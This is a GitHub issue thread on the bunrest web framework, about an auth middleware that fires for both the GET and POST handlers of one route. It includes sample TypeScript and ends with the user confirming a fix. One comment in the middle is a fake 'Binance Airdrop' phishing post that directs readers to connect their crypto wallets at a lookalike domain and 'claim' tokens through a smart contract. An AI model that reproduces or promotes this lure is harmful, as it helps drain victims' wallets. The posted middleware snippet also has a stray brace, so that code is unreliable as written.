### ISSUE TITLE
Middlewares Activating for All Methods of a Route

### ISSUE THREAD

**Issue by lewisjr** [lau1944/bunrest#34]
I have a path that can be accessed via `GET` or `POST`, for differing reasons. I have an auth middleware on the `GET` handler, however, the middleware is also being applied to the `POST` handler. See the code below:

```ts
authRouter.post("", async (req, res) => {
   // stuff
   res.status(200).json({ data });
});

authRouter.get("", authMiddleware, async (req, res) => {
   // stuff
   res.status(200).json({ data });
});

app.use("/analytics", authRouter);
```

**Other Relevant Info:**  
Bun version: `v1.0.7`  
bunrest version: `v1.3.6`  
platform: ubuntu 20.04 (docker image)  
node installed: yes  
node version: `v18.18.2`

**Comment by lau1944** [comment]
Cannot reproduce, please upload the full sample code.

**Comment by lewisjr** [comment]
Closed by mistake:

I'm sending my request without the header so that it fails.

**middleware.ts.ts**

```ts
import { Handler } from "bunrest/src/server/request";

const authMiddleware: Handler = (req, res, next?, err?) => {
	const authToken = req.headers ? req.headers["x-token"] : null;

	if (authToken) {
			req.token=authToken

			// @ts-ignore
			next();
		}
	} else {
		res.status(400).json({ message: "Invalid credentials provided." });
		return;
	}
};

export default authMiddleware;
```

**index.ts**

```ts
import server from "bunrest";
import authRouter from "./auth";

const app = server();

app.use("/auth", authRouter);

app.listen(Bun.env.PORT, () => {
	console.log(`[startup]: Server running on port "${Bun.env.PORT}"`);
});
```

**auth/authRouter.ts**

```ts
import server from "bunrest";
import authMiddleware from "@middleware";

const authRouter= server().router();

authRouter.get("", authMiddleware, async (req, res) => {
   res.status(200).json({ success: true });
});

authRouter.post("", authMiddleware, async (req, res) => {
   res.status(200).json({ success: true });
});
```

**Comment by nielsvantslot** [comment]
@lewisjr can you check if it's fixed on #40

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @sudhir-acharya, @kunsanw, @ITrover, @songGHB, @Tony3141Hui, @Luoqinglong123, @Beanactor, @Bytesu, @ShiYK-0517, @litchiit

**Comment by lewisjr** [comment]
I confirm that it works now, thank you so much. I am using:

bunrest `v1.3.8`  
bun `v1.14`

**Comment by lewisjr** [comment]
closing
